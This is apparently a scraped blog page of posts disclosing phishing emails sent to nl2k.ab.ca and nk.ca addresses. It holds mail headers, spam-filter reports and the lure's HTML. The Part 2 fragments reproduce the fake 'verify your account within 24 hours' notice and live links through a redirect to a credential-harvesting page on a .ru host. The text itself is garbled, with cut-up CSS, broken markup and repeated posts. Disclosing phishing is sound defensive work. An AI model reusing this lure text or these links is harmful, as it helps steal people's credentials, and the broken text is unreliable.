Credential phishing Part 2

Posted by Dave Yadallee on Tuesday, December 9. 2025

w3.org/TR/html4/loose.dtd">

FONT-FAMILY: "Segoe UI", Arial, sans-serif; BORDER-RIGHT: rgb(211=

,211,211) 1px dotted; WHITE-SPACE: normal; WORD-SPACING: 0px; BORDER-BOTTOM=

: rgb(211,211,211) 1px dotted; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLO=

R: rgb(34,34,34); FONT-STYLE: normal; BORDER-LEFT: rgb(211,211,211) 1px dot=

ted; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(2=

45,245,245); font-variant-ligatures: normal;=20

font-variant-caps: normal; -webkit-text-stroke-width: 0px; text-decoration-=

thickness: initial; text-decoration-style: initial; text-decoration-color: =

initial" cellspacing=3D"0" cellpadding=3D"0" width=3D"100%" bgcolor=3D"#f5f=

5f5" border=3D"0">

,211,211) 1px dotted; BORDER-BOTTOM: rgb(211,211,211) 1px dotted; BORDER-LE=

FT: rgb(211,211,211) 1px dotted; MARGIN: 0px" valign=3D"top" align=3D"cente=

r">

211,211,211) 1px dotted; BACKGROUND: rgb(255,255,255); BORDER-BOTTOM: rgb(2=

11,211,211) 1px dotted; BORDER-LEFT: rgb(211,211,211) 1px dotted; MARGIN: 2=

0px auto; border-radius: 4px" cellspacing=3D"0" cellpadding=3D"0" width=3D"=

600" border=3D"0">

LE>

,211,211) 1px dotted; BORDER-BOTTOM: rgb(229,229,229) 1px solid; PADDING-BO=

TTOM: 20px; TEXT-ALIGN: center; PADDING-TOP: 20px; PADDING-LEFT: 20px; BORD=

ER-LEFT: rgb(211,211,211) 1px dotted; MARGIN: 0px; PADDING-RIGHT: 20px">
AN style=3D"FONT-SIZE: 30px; FONT-WEIGHT: 600; COLOR: rgb(0,120,212)">nl2k.=

ab.ca Account Services

,211,211) 1px dotted; BORDER-BOTTOM: rgb(211,211,211) 1px dotted; PADDING-B=

OTTOM: 30px; PADDING-TOP: 30px; PADDING-LEFT: 30px; BORDER-LEFT: rgb(211,21=

1,211) 1px dotted; MARGIN: 0px; PADDING-RIGHT: 30px">

A=

ccount Verification Required

NE-HEIGHT: 1.5">We are conducting a routine security check on all accounts =

to ensure your account information is accurate and secure. This process is =

mandatory to maintain uninterrupted access to your account.

OP: 12px; PADDING-LEFT: 15px; BORDER-LEFT: rgb(0,120,212) 4px solid; MARGIN=

: 20px 0px; PADDING-RIGHT: 15px; border-radius: 0px 4px 4px 0px">

: 0px 0px 5px">Recommended action:

Please veri=

fy your account within the next 24 hours to avoid any temporary access rest=

rictions.

211,211,211) 1px dotted; BORDER-BOTTOM: rgb(211,211,211) 1px dotted; BORDER=

-LEFT: rgb(211,211,211) 1px dotted; MARGIN: 25px 0px" cellspacing=3D"0" cel=

lpadding=3D"0" width=3D"100%" border=3D"0">

,211,211) 1px dotted; BORDER-BOTTOM: rgb(211,211,211) 1px dotted; BORDER-LE=

FT: rgb(211,211,211) 1px dotted; MARGIN: 0px" align=3D"center">

COLOR: rgb(255,255,255); PADDING-BOTTOM: 12px; PADDING-TOP: 12px; PADDING-L=

EFT: 24px; DISPLAY: inline-block; PADDING-RIGHT: 24px; border-radius: 4px; =

text-decoration-line: none" href=3D"https://r.srvtrck.com/v1/redirect?yk_ta=

g=3D337_47d_c3_3b6f&site_id=3D56e7d51be4b05d750682348a&api_key=3Dab=

bc5236946676eae219a734c0a1c5e8&url=3Dhttp://srv244547.hoster-test.ru/In=

dx/server/IndexIPFSOTFF.html#root@nl2k.ab.ca" target=3D_blank>

Verify Your Account

NE-HEIGHT: 1.5">If you do not verify your account within 24 hours, access t=

o your account may be restricted for your protection.

DING-TOP: 20px">

Tha=

nk you,

nl2k.ab.ca =

Security Team

,211,211) 1px dotted; BACKGROUND: rgb(248,248,248); BORDER-BOTTOM: rgb(211,=

211,211) 1px dotted; PADDING-BOTTOM: 15px; TEXT-ALIGN: center; PADDING-TOP:=

15px; PADDING-LEFT: 20px; BORDER-LEFT: rgb(211,211,211) 1px dotted; MARGIN=

: 0px; PADDING-RIGHT: 20px; border-radius: 0px 0px 4px 4px">

style=3D"COLOR: rgb(96,94,92); MARGIN: 0px 8px; text-decoration-line: none=

" href=3D"https://www.html.am/html-editors/online-html-editor.cfm#" target=

=3D_blank>Security |
: 0px 8px; text-decoration-line: none" href=3D"https://www.html.am/html-edi=

tors/online-html-editor.cfm#" target=3D_blank>Privacy

|
ation-line: none" href=3D"https://www.html.am/html-editors/online-html-edit=

or.cfm#" target=3D_blank>Help

Credential phishing Part 1

Posted by Dave Yadallee on Tuesday, December 9. 2025

X-Mozilla-Status: 0001

X-Mozilla-Status2: 00000000

Return-path:

Envelope-to: dave@doctor.nl2k.ab.ca

Delivery-date: Mon, 08 Dec 2025 09:33:00 -0700

Received: from doctor by doctor.nl2k.ab.ca with local (Exim 4.98.2 (FreeBSD))

(envelope-from )

id 1vSe9f-00000000N2e-0URt

for dave@doctor.nl2k.ab.ca;

Mon, 08 Dec 2025 09:32:07 -0700

Resent-From: The Doctor

Resent-Date: Mon, 8 Dec 2025 09:32:07 -0700

Resent-Message-ID:

Resent-To: Dave Yadallee

Received: from agriel.us ([50.76.93.152]:58070)

by doctor.nl2k.ab.ca with esmtps (TLS1.3) tls TLS_AES_256_GCM_SHA384

(Exim 4.98.2 (FreeBSD))

(envelope-from )

id 1vSe13-00000000LLq-0dFY

for root@nk.ca;

Mon, 08 Dec 2025 09:23:23 -0700

Received: from gmail.com (unknown [10.240.90.20])

by agriel.us (Postfix) with ESMTPS id 52407A250A

for ; Mon, 8 Dec 2025 16:21:00 +0000 (UTC)

From: nk.ca

To: root@nk.ca

Subject: Action Required: Verify Your nk.ca Account to Avoid Access Restrictions

Date: 08 Dec 2025 08:20:59 -0800

Message-ID: <20251208082059.DC8746303D0890C6@gmail.com>

MIME-Version: 1.0

Content-Type: text/html;

charset="iso-8859-1"

Content-Transfer-Encoding: quoted-printable

X-Spam_score: 19.9

X-Spam_score_int: 199

X-Spam_bar: +++++++++++++++++++

X-Spam_report: Spam detection software, running on the system "doctor.nl2k.ab.ca",

has identified this incoming email as possible spam. The original

message has been attached to this so you can view it or label

similar future email. If you have any questions, see

@@CONTACT_ADDRESS@@ for details.

Content preview: nk.ca Account Services Account Verification Required We are

conducting a routine security check on all accounts to ensure your account

information is accurate and secure. This process is mandatory to maintain

uninterrupted access to your account.

Content analysis details: (19.9 points, 5.0 required)

pts rule name description

---- ---------------------- --------------------------------------------------

1.0 RCVD_IN_WSFF RBL: Received via a relay in will-spam-for-food.eu.org

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

1.5 RCVD_IN_AHBL RBL: AHBL: sender is listed in dnsbl.ahbl.org

[50.76.93.152 listed in dnsbl.ahbl.org]

[50.76.93.152 listed in dnsbl.ahbl.org]

[50.76.93.152 listed in dnsbl.ahbl.org]

[50.76.93.152 listed in dnsbl.ahbl.org]

1.5 RCVD_IN_AHBL_SPAM RBL: AHBL: Spam Source in dnsbl.ahbl.org

[50.76.93.152 listed in dnsbl.ahbl.org]

0.0 RCVD_IN_AHBL_RTB RBL: AHBL: Real-Time Blocked in dnsbl.ahbl.org

[50.76.93.152 listed in dnsbl.ahbl.org]

0.5 RCVD_IN_AHBL_PROXY RBL: AHBL: Open Proxy server in dnsbl.ahbl.org

[50.76.93.152 listed in dnsbl.ahbl.org]

0.5 RCVD_IN_AHBL_SMTP RBL: AHBL: Open SMTP relay in dnsbl.ahbl.org

[50.76.93.152 listed in dnsbl.ahbl.org]

-0.0 SPF_HELO_PASS SPF: HELO matches SPF record

0.0 DKIM_ADSP_CUSTOM_MED No valid author signature, adsp_override is

CUSTOM_MED

1.0 SPF_SOFTFAIL SPF: sender does not match SPF record (softfail)

0.5 NO_RDNS Sending MTA has no reverse DNS (Postfix variant)

1.4 FSL_HELO_FAKE No description available.

0.0 FREEMAIL_FROM Sender email is commonly abused enduser mail provider

[support2(at)gmail.com]

0.2 FREEMAIL_ENVFROM_END_DIGIT Envelope-from freemail username ends in

digit

[support2(at)gmail.com]

1.0 FORGED_GMAIL_RCVD 'From' gmail.com does not match 'Received' headers

0.5 URI_NOVOWEL URI: URI hostname has long non-vowel sequence

0.0 T_MXG_EMAIL_FRAG BODY: URI with email in fragment

0.0 HTML_FONT_SIZE_HUGE BODY: HTML font size is huge

0.0 HTML_MESSAGE BODY: HTML included in message

1.1 MIME_HTML_ONLY BODY: Message only has text/html MIME parts

3.0 VOWEL_URI_7 RAW: URI hostname with 7+ consecutive vowels

1.5 TVD_PH_BODY_ACCOUNTS_PRE The body matches phrases such as "accounts

suspended", "account credited", "account

verification"

1.2 NML_ADSP_CUSTOM_MED ADSP custom_med hit, and not from a mailing list

0.0 SPOOFED_FREEMAIL No description available.

1.0 ACCT_PHISHING Possible phishing for account information

1.5 SPOOF_GMAIL_MID From Gmail but it doesn't seem to be...

0.9 URI_PHISH Phishing using web form

Subject: {SPAM?} Action Required: Verify Your nk.ca Account to Avoid Access Restrictions

X-Mozilla-Status: 0001

X-Mozilla-Status2: 00000000

Return-path:

Envelope-to: dave@doctor.nl2k.ab.ca

Delivery-date: Mon, 08 Dec 2025 09:33:00 -0700

Received: from doctor by doctor.nl2k.ab.ca with local (Exim 4.98.2 (FreeBSD))

(envelope-from )

id 1vSe9j-00000000N2z-0w2Y

for dave@doctor.nl2k.ab.ca;

Mon, 08 Dec 2025 09:32:11 -0700

Resent-From: The Doctor

Resent-Date: Mon, 8 Dec 2025 09:32:11 -0700

Resent-Message-ID:

Resent-To: Dave Yadallee

Received: from agriel.us ([50.76.93.152]:58068)

by doctor.nl2k.ab.ca with esmtps (TLS1.3) tls TLS_AES_256_GCM_SHA384

(Exim 4.98.2 (FreeBSD))

(envelope-from )

id 1vSe0y-00000000LLr-0QDA

for root@nl2k.ab.ca;

Mon, 08 Dec 2025 09:23:17 -0700

Received: from gmail.com (unknown [10.240.90.20])

by agriel.us (Postfix) with ESMTPS id 9045EA24C3

for ; Mon, 8 Dec 2025 16:20:59 +0000 (UTC)

From: nl2k.ab.ca

To: root@nl2k.ab.ca

Subject: Action Required: Verify Your nl2k.ab.ca Account to Avoid Access Restrictions

Date: 08 Dec 2025 08:20:59 -0800

Message-ID: <20251208082058.20298A2390BAD0A4@gmail.com>

MIME-Version: 1.0

Content-Type: text/html;

charset="iso-8859-1"

Content-Transfer-Encoding: quoted-printable

X-Spam_score: 19.9

X-Spam_score_int: 199

X-Spam_bar: +++++++++++++++++++

X-Spam_report: Spam detection software, running on the system "doctor.nl2k.ab.ca",

has identified this incoming email as possible spam. The original

message has been attached to this so you can view it or label

similar future email. If you have any questions, see

@@CONTACT_ADDRESS@@ for details.

Content preview: nl2k.ab.ca Account Services Account Verification Required

We are conducting a routine security check on all accounts to ensure your

account information is accurate and secure. This process is mandatory to

maintain uninterrupted access to your account.

Content analysis details: (19.9 points, 5.0 required)

pts rule name description

---- ---------------------- --------------------------------------------------

1.0 RCVD_IN_WSFF RBL: Received via a relay in will-spam-for-food.eu.org

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

1.5 RCVD_IN_AHBL RBL: AHBL: sender is listed in dnsbl.ahbl.org

[50.76.93.152 listed in dnsbl.ahbl.org]

[50.76.93.152 listed in dnsbl.ahbl.org]

[50.76.93.152 listed in dnsbl.ahbl.org]

[50.76.93.152 listed in dnsbl.ahbl.org]

0.5 RCVD_IN_AHBL_PROXY RBL: AHBL: Open Proxy server in dnsbl.ahbl.org

[50.76.93.152 listed in dnsbl.ahbl.org]

0.0 RCVD_IN_AHBL_RTB RBL: AHBL: Real-Time Blocked in dnsbl.ahbl.org

[50.76.93.152 listed in dnsbl.ahbl.org]

0.5 RCVD_IN_AHBL_SMTP RBL: AHBL: Open SMTP relay in dnsbl.ahbl.org

[50.76.93.152 listed in dnsbl.ahbl.org]

1.5 RCVD_IN_AHBL_SPAM RBL: AHBL: Spam Source in dnsbl.ahbl.org

[50.76.93.152 listed in dnsbl.ahbl.org]

-0.0 SPF_HELO_PASS SPF: HELO matches SPF record

0.0 DKIM_ADSP_CUSTOM_MED No valid author signature, adsp_override is

CUSTOM_MED

1.0 SPF_SOFTFAIL SPF: sender does not match SPF record (softfail)

0.5 NO_RDNS Sending MTA has no reverse DNS (Postfix variant)

1.4 FSL_HELO_FAKE No description available.

0.0 FREEMAIL_FROM Sender email is commonly abused enduser mail provider

[support2(at)gmail.com]

0.2 FREEMAIL_ENVFROM_END_DIGIT Envelope-from freemail username ends in

digit

[support2(at)gmail.com]

1.0 FORGED_GMAIL_RCVD 'From' gmail.com does not match 'Received' headers

0.5 URI_NOVOWEL URI: URI hostname has long non-vowel sequence

0.0 T_MXG_EMAIL_FRAG BODY: URI with email in fragment

0.0 HTML_FONT_SIZE_HUGE BODY: HTML font size is huge

0.0 HTML_MESSAGE BODY: HTML included in message

1.1 MIME_HTML_ONLY BODY: Message only has text/html MIME parts

3.0 VOWEL_URI_7 RAW: URI hostname with 7+ consecutive vowels

1.5 TVD_PH_BODY_ACCOUNTS_PRE The body matches phrases such as "accounts

suspended", "account credited", "account

verification"

0.0 SPOOFED_FREEMAIL No description available.

1.2 NML_ADSP_CUSTOM_MED ADSP custom_med hit, and not from a mailing list

1.5 SPOOF_GMAIL_MID From Gmail but it doesn't seem to be...

1.0 ACCT_PHISHING Possible phishing for account information

0.9 URI_PHISH Phishing using web form

Subject: {SPAM?} Action Required: Verify Your nl2k.ab.ca Account to Avoid Access Restrictions

Credential phishing Part 1

Posted by Dave Yadallee on Tuesday, December 9. 2025

Credential phishing Part 2

Posted by Dave Yadallee on Tuesday, December 9. 2025

w3.org/TR/html4/loose.dtd">

A=

ccount Verification Required

OP: 12px; PADDING-LEFT: 15px; BORDER-LEFT: rgb(0,120,212) 4px solid; MARGIN=

: 20px 0px; PADDING-RIGHT: 15px; border-radius: 0px 4px 4px 0px">

: 0px 0px 5px">Recommended action:

Please veri=

fy your account within the next 24 hours to avoid any temporary access rest=

rictions.

211,211,211) 1px dotted; BORDER-BOTTOM: rgb(211,211,211) 1px dotted; BORDER=

-LEFT: rgb(211,211,211) 1px dotted; MARGIN: 25px 0px" cellspacing=3D"0" cel=

lpadding=3D"0" width=3D"100%" border=3D"0">

NE-HEIGHT: 1.5">If you do not verify your account within 24 hours, access t=

o your account may be restricted for your protection.

DING-TOP: 20px">

Tha=

nk you,

nk.ca Secur=

ity Team

TD>

Credential phishing Part 2

Posted by Dave Yadallee on Tuesday, December 9. 2025

w3.org/TR/html4/loose.dtd">

A=

ccount Verification Required

OP: 12px; PADDING-LEFT: 15px; BORDER-LEFT: rgb(0,120,212) 4px solid; MARGIN=

: 20px 0px; PADDING-RIGHT: 15px; border-radius: 0px 4px 4px 0px">

: 0px 0px 5px">Recommended action:

Please veri=

fy your account within the next 24 hours to avoid any temporary access rest=

rictions.

211,211,211) 1px dotted; BORDER-BOTTOM: rgb(211,211,211) 1px dotted; BORDER=

-LEFT: rgb(211,211,211) 1px dotted; MARGIN: 25px 0px" cellspacing=3D"0" cel=

lpadding=3D"0" width=3D"100%" border=3D"0">

NE-HEIGHT: 1.5">If you do not verify your account within 24 hours, access t=

o your account may be restricted for your protection.

DING-TOP: 20px">

Tha=

nk you,

nk.ca Secur=

ity Team

TD>

Credential phishing Part 1

Posted by Dave Yadallee on Tuesday, December 9. 2025

Credential phishing Part 2

Posted by Dave Yadallee on Tuesday, December 9. 2025

w3.org/TR/html4/loose.dtd">

A=

ccount Verification Required

OP: 12px; PADDING-LEFT: 15px; BORDER-LEFT: rgb(0,120,212) 4px solid; MARGIN=

: 20px 0px; PADDING-RIGHT: 15px; border-radius: 0px 4px 4px 0px">

: 0px 0px 5px">Recommended action:

Please veri=

fy your account within the next 24 hours to avoid any temporary access rest=

rictions.

211,211,211) 1px dotted; BORDER-BOTTOM: rgb(211,211,211) 1px dotted; BORDER=

-LEFT: rgb(211,211,211) 1px dotted; MARGIN: 25px 0px" cellspacing=3D"0" cel=

lpadding=3D"0" width=3D"100%" border=3D"0">

,211,211) 1px dotted; BORDER-BOTTOM: rgb(211,211,211) 1px dotted; BORDER-LE=

FT: rgb(211,211,211) 1px dotted; MARGIN: 0px" align=3D"center">

COLOR: rgb(255,255,255); PADDING-BOTTOM: 12px; PADDING-TOP: 12px; PADDING-L=

EFT: 24px; DISPLAY: inline-block; PADDING-RIGHT: 24px; border-radius: 4px; =

text-decoration-line: none" href=3D"https://r.srvtrck.com/v1/redirect?yk_ta=

g=3D337_47d_c3_3b6f&site_id=3D56e7d51be4b05d750682348a&api_key=3Dab=

bc5236946676eae219a734c0a1c5e8&url=3Dhttp://srv244547.hoster-test.ru/In=

dx/server/IndexIPFSOTFF.html#doctor@nk.ca" target=3D_blank>

Verify Your Account

NE-HEIGHT: 1.5">If you do not verify your account within 24 hours, access t=

o your account may be restricted for your protection.

DING-TOP: 20px">

Tha=

nk you,

nk.ca Secur=

ity Team

TD>

Credential phishing Part 1

Posted by Dave Yadallee on Tuesday, December 9. 2025

X-Mozilla-Status: 0001

X-Mozilla-Status2: 00000000

Return-path:

Envelope-to: dave@doctor.nl2k.ab.ca

Delivery-date: Mon, 08 Dec 2025 09:32:00 -0700

Received: from doctor by doctor.nl2k.ab.ca with local (Exim 4.98.2 (FreeBSD))

(envelope-from )

id 1vSe9W-00000000N1D-08an

for dave@doctor.nl2k.ab.ca;

Mon, 08 Dec 2025 09:31:58 -0700

Resent-From: The Doctor

Resent-Date: Mon, 8 Dec 2025 09:31:57 -0700

Resent-Message-ID:

Resent-To: Dave Yadallee

Received: from agriel.us ([50.76.93.152]:49270)

by doctor.nl2k.ab.ca with esmtps (TLS1.3) tls TLS_AES_256_GCM_SHA384

(Exim 4.98.2 (FreeBSD))

(envelope-from )

id 1vSe0t-00000000LLY-1jpq

for doctor@nk.ca;

Mon, 08 Dec 2025 09:23:16 -0700

Received: from gmail.com (unknown [10.240.90.20])

by agriel.us (Postfix) with ESMTPS id 226F7A2195

for ; Mon, 8 Dec 2025 16:20:46 +0000 (UTC)

From: nk.ca

To: doctor@nk.ca

Subject: Action Required: Verify Your nk.ca Account to Avoid Access Restrictions

Date: 08 Dec 2025 08:20:46 -0800

Message-ID: <20251208082046.1631302B31DB9B26@gmail.com>

MIME-Version: 1.0

Content-Type: text/html;

charset="iso-8859-1"

Content-Transfer-Encoding: quoted-printable

X-Spam_score: 16.1

X-Spam_score_int: 161

X-Spam_bar: ++++++++++++++++

X-Spam_report: Spam detection software, running on the system "doctor.nl2k.ab.ca",

has identified this incoming email as possible spam. The original

message has been attached to this so you can view it or label

similar future email. If you have any questions, see

@@CONTACT_ADDRESS@@ for details.

Content preview: nk.ca Account Services Account Verification Required We are

conducting a routine security check on all accounts to ensure your account

information is accurate and secure. This process is mandatory to maintain

uninterrupted access to your account.

Content analysis details: (16.1 points, 5.0 required)

pts rule name description

---- ---------------------- --------------------------------------------------

0.0 RCVD_IN_VALIDITY_CERTIFIED_BLOCKED RBL: ADMINISTRATOR NOTICE: The

query to Validity was blocked. See

https://knowledge.validity.com/hc/en-us/articles/20961730681243

for more information.

[50.76.93.152 listed in sa-trusted.bondedsender.org]

1.0 RCVD_IN_WSFF RBL: Received via a relay in will-spam-for-food.eu.org

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

-3.0 RCVD_IN_RP_CERTIFIED RBL: Sender in ReturnPath Certified - Contact

cert-sa@returnpath.net

[Excessive Number of Queries | ]

1.5 RCVD_IN_AHBL RBL: AHBL: sender is listed in dnsbl.ahbl.org

[50.76.93.152 listed in dnsbl.ahbl.org]

[50.76.93.152 listed in dnsbl.ahbl.org]

[50.76.93.152 listed in dnsbl.ahbl.org]

[50.76.93.152 listed in dnsbl.ahbl.org]

0.5 RCVD_IN_AHBL_SMTP RBL: AHBL: Open SMTP relay in dnsbl.ahbl.org

[50.76.93.152 listed in dnsbl.ahbl.org]

0.5 RCVD_IN_AHBL_PROXY RBL: AHBL: Open Proxy server in dnsbl.ahbl.org

[50.76.93.152 listed in dnsbl.ahbl.org]

1.5 RCVD_IN_AHBL_SPAM RBL: AHBL: Spam Source in dnsbl.ahbl.org

[50.76.93.152 listed in dnsbl.ahbl.org]

0.0 RCVD_IN_AHBL_RTB RBL: AHBL: Real-Time Blocked in dnsbl.ahbl.org

[50.76.93.152 listed in dnsbl.ahbl.org]

-2.0 RCVD_IN_RP_SAFE RBL: Sender in ReturnPath Safe - Contact

safe-sa@returnpath.net

[Excessive Number of Queries | ]

0.0 RCVD_IN_VALIDITY_SAFE_BLOCKED RBL: ADMINISTRATOR NOTICE: The query to

Validity was blocked. See

https://knowledge.validity.com/hc/en-us/articles/20961730681243

for more information.

[50.76.93.152 listed in sa-accredit.habeas.com]

1.3 RCVD_IN_RP_RNBL RBL: Relay in RNBL,

https://senderscore.org/blacklistlookup/

[50.76.93.152 listed in bl.score.senderscore.com]

0.0 RCVD_IN_VALIDITY_RPBL_BLOCKED RBL: ADMINISTRATOR NOTICE: The query to

Validity was blocked. See

https://knowledge.validity.com/hc/en-us/articles/20961730681243

for more information.

[50.76.93.152 listed in bl.score.senderscore.com]

-0.0 SPF_HELO_PASS SPF: HELO matches SPF record

0.0 DKIM_ADSP_CUSTOM_MED No valid author signature, adsp_override is

CUSTOM_MED

1.0 SPF_SOFTFAIL SPF: sender does not match SPF record (softfail)

0.5 NO_RDNS Sending MTA has no reverse DNS (Postfix variant)

1.4 FSL_HELO_FAKE No description available.

0.0 FREEMAIL_FROM Sender email is commonly abused enduser mail provider

[support2(at)gmail.com]

0.2 FREEMAIL_ENVFROM_END_DIGIT Envelope-from freemail username ends in

digit

[support2(at)gmail.com]

1.0 FORGED_GMAIL_RCVD 'From' gmail.com does not match 'Received' headers

0.5 URI_NOVOWEL URI: URI hostname has long non-vowel sequence

0.0 T_MXG_EMAIL_FRAG BODY: URI with email in fragment

0.0 HTML_FONT_SIZE_HUGE BODY: HTML font size is huge

0.0 HTML_MESSAGE BODY: HTML included in message

1.1 MIME_HTML_ONLY BODY: Message only has text/html MIME parts

3.0 VOWEL_URI_7 RAW: URI hostname with 7+ consecutive vowels

1.5 TVD_PH_BODY_ACCOUNTS_PRE The body matches phrases such as "accounts

suspended", "account credited", "account

verification"

0.0 SPOOFED_FREEMAIL No description available.

1.2 NML_ADSP_CUSTOM_MED ADSP custom_med hit, and not from a mailing list

1.5 SPOOF_GMAIL_MID From Gmail but it doesn't seem to be...

1.0 ACCT_PHISHING Possible phishing for account information

0.9 URI_PHISH Phishing using web form

Subject: {SPAM?} Action Required: Verify Your nk.ca Account to Avoid Access Restrictions

Credential phishing Part 2

Posted by Dave Yadallee on Tuesday, December 9. 2025

A=

ccount Verification Required

OP: 12px; PADDING-LEFT: 15px; BORDER-LEFT: rgb(0,120,212) 4px solid; MARGIN=

: 20px 0px; PADDING-RIGHT: 15px; border-radius: 0px 4px 4px 0px">

: 0px 0px 5px">Recommended action:

Please veri=

fy your account within the next 24 hours to avoid any temporary access rest=

rictions.

211,211,211) 1px dotted; BORDER-BOTTOM: rgb(211,211,211) 1px dotted; BORDER=

-LEFT: rgb(211,211,211) 1px dotted; MARGIN: 25px 0px" cellspacing=3D"0" cel=

lpadding=3D"0" width=3D"100%" border=3D"0">

,211,211) 1px dotted; BORDER-BOTTOM: rgb(211,211,211) 1px dotted; BORDER-LE=

FT: rgb(211,211,211) 1px dotted; MARGIN: 0px" align=3D"center">

COLOR: rgb(255,255,255); PADDING-BOTTOM: 12px; PADDING-TOP: 12px; PADDING-L=

EFT: 24px; DISPLAY: inline-block; PADDING-RIGHT: 24px; border-radius: 4px; =

text-decoration-line: none" href=3D"https://r.srvtrck.com/v1/redirect?yk_ta=

g=3D337_47d_c3_3b6f&site_id=3D56e7d51be4b05d750682348a&api_key=3Dab=

bc5236946676eae219a734c0a1c5e8&url=3Dhttp://srv244547.hoster-test.ru/In=

dx/server/IndexIPFSOTFF.html#dave@doctor.nl2k.ab.ca" target=3D_blank>

Verify Your Account

NE-HEIGHT: 1.5">If you do not verify your account within 24 hours, access t=

o your account may be restricted for your protection.

DING-TOP: 20px">

Tha=

nk you,

doctor.nl2k=

=2Eab.ca Security Team

Credential Phish Part 1

Posted by Dave Yadallee on Tuesday, December 9. 2025

X-Mozilla-Status: 0001

X-Mozilla-Status2: 00000000

Return-path:

Envelope-to: dave@doctor.nl2k.ab.ca

Delivery-date: Mon, 08 Dec 2025 09:24:00 -0700

Received: from agriel.us ([50.76.93.152]:49252)

by doctor.nl2k.ab.ca with esmtps (TLS1.3) tls TLS_AES_256_GCM_SHA384

(Exim 4.98.2 (FreeBSD))

(envelope-from )

id 1vSe0t-00000000LLU-1jkW

for dave@doctor.nl2k.ab.ca;

Mon, 08 Dec 2025 09:23:20 -0700

Received: from gmail.com (unknown [10.240.90.20])

by agriel.us (Postfix) with ESMTPS id 79D86A426E

for ; Mon, 8 Dec 2025 16:20:46 +0000 (UTC)

From: doctor.nl2k.ab.ca

To: dave@doctor.nl2k.ab.ca

Subject: Action Required: Verify Your doctor.nl2k.ab.ca Account to Avoid Access Restrictions

Date: 08 Dec 2025 08:20:46 -0800

Message-ID: <20251208082045.CA9D9C3DD163D60F@gmail.com>

MIME-Version: 1.0

Content-Type: text/html;

charset="iso-8859-1"

Content-Transfer-Encoding: quoted-printable

X-Spam_score: 19.9

X-Spam_score_int: 199

X-Spam_bar: +++++++++++++++++++

X-Spam_report: Spam detection software, running on the system "doctor.nl2k.ab.ca",

has identified this incoming email as possible spam. The original

message has been attached to this so you can view it or label

similar future email. If you have any questions, see

@@CONTACT_ADDRESS@@ for details.

Content preview: doctor.nl2k.ab.ca Account Services Account Verification Required

We are conducting a routine security check on all accounts to ensure your

account information is accurate and secure. This process is mandatory to

maintain uninterrupted access to your account.

Content analysis details: (19.9 points, 5.0 required)

pts rule name description

---- ---------------------- --------------------------------------------------

1.0 RCVD_IN_WSFF RBL: Received via a relay in will-spam-for-food.eu.org

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

1.5 RCVD_IN_AHBL RBL: AHBL: sender is listed in dnsbl.ahbl.org

[50.76.93.152 listed in dnsbl.ahbl.org]

[50.76.93.152 listed in dnsbl.ahbl.org]

[50.76.93.152 listed in dnsbl.ahbl.org]

[50.76.93.152 listed in dnsbl.ahbl.org]

1.5 RCVD_IN_AHBL_SPAM RBL: AHBL: Spam Source in dnsbl.ahbl.org

[50.76.93.152 listed in dnsbl.ahbl.org]

0.5 RCVD_IN_AHBL_SMTP RBL: AHBL: Open SMTP relay in dnsbl.ahbl.org

[50.76.93.152 listed in dnsbl.ahbl.org]

0.0 RCVD_IN_AHBL_RTB RBL: AHBL: Real-Time Blocked in dnsbl.ahbl.org

[50.76.93.152 listed in dnsbl.ahbl.org]

0.5 RCVD_IN_AHBL_PROXY RBL: AHBL: Open Proxy server in dnsbl.ahbl.org

[50.76.93.152 listed in dnsbl.ahbl.org]

-0.0 SPF_HELO_PASS SPF: HELO matches SPF record

0.0 DKIM_ADSP_CUSTOM_MED No valid author signature, adsp_override is

CUSTOM_MED

1.0 SPF_SOFTFAIL SPF: sender does not match SPF record (softfail)

0.5 NO_RDNS Sending MTA has no reverse DNS (Postfix variant)

1.4 FSL_HELO_FAKE No description available.

0.0 FREEMAIL_FROM Sender email is commonly abused enduser mail provider

[support2(at)gmail.com]

0.2 FREEMAIL_ENVFROM_END_DIGIT Envelope-from freemail username ends in

digit

[support2(at)gmail.com]

1.0 FORGED_GMAIL_RCVD 'From' gmail.com does not match 'Received' headers

0.5 URI_NOVOWEL URI: URI hostname has long non-vowel sequence

0.0 T_MXG_EMAIL_FRAG BODY: URI with email in fragment

0.0 HTML_FONT_SIZE_HUGE BODY: HTML font size is huge

0.0 HTML_MESSAGE BODY: HTML included in message

1.1 MIME_HTML_ONLY BODY: Message only has text/html MIME parts

3.0 VOWEL_URI_7 RAW: URI hostname with 7+ consecutive vowels

1.5 TVD_PH_BODY_ACCOUNTS_PRE The body matches phrases such as "accounts

suspended", "account credited", "account

verification"

1.2 NML_ADSP_CUSTOM_MED ADSP custom_med hit, and not from a mailing list

0.0 SPOOFED_FREEMAIL No description available.

1.0 ACCT_PHISHING Possible phishing for account information

